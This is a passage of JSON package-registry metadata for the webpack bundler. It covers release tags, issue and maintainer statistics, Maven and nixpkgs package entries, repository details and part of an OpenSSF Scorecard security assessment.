v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-31T12:10:10.861Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":34.745337335761036,"dependent_packages_count":49.67865754638059,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":42.211997441070814},"purl":"pkg:maven/org.mvnpm/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm:webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm:webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm:webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T17:00:08.374Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:webpack/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":620582,"maintainers_count":0,"namespaces_count":82431,"keywords_count":36859,"github":"maven-central","metadata":{"funded_packages_count":48141,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-02T05:05:01.920Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":12798135,"name":"nodePackages_latest.webpack","ecosystem":"nixpkgs","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T14:08:31.182Z","latest_release_published_at":"2026-01-26T14:08:31.182Z","latest_release_number":"5.83.1","last_synced_at":"2026-04-02T20:17:19.455Z","created_at":"2026-01-26T14:08:30.592Z","updated_at":"2026-08-23T01:47:50.997Z","registry_url":"https://search.nixos.org/packages?channel=23.05\u0026query=nodePackages_latest.webpack","install_command":"nix-env -iA nixpkgs.nodePackages_latest.webpack","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.05/pkgs/development/node-packages/node-packages.nix#L153596","metadata":{"nix_attribute":"webpack-5.83.1","position":"pkgs/development/node-packages/node-packages.nix:153596","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mipsel-linux","mips64el-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"],"upstream_ecosystem":"npm","upstream_name":"webpack","upstream_purl":"pkg:npm/webpack"},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: 